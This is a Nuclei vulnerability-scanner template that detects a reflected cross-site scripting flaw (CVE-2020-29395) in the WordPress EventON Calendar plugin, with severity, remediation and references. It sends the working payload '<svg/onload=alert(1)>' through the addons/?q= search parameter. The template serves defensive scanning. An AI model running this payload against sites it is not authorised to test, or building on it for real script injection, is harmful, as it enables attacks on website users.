nuclei-templates/http/cves/2020/CVE-2020-29395.yaml

65 lines
2.1 KiB
YAML

id: CVE-2020-29395
info:
name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
remediation: |
Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability.
reference:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://www.myeventon.com/news/
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
- http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-29395
cwe-id: CWE-79
epss-score: 0.05489
epss-percentile: 0.93054
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: myeventon
product: eventon
framework: wordpress
tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- '/wp-content/plugins/eventON/'
- method: GET
path:
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(1)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402201a710f599e37ca84f4c5ce50b0de3c5b186ecb2e2cde5baa91a5c12c03034c4102204701cdfa4f09f39c53d5b5c108f3d652ba3f452608e7b4a10e86eb9f1b2cbf65:922c64590222798bb761d5b6d8e72950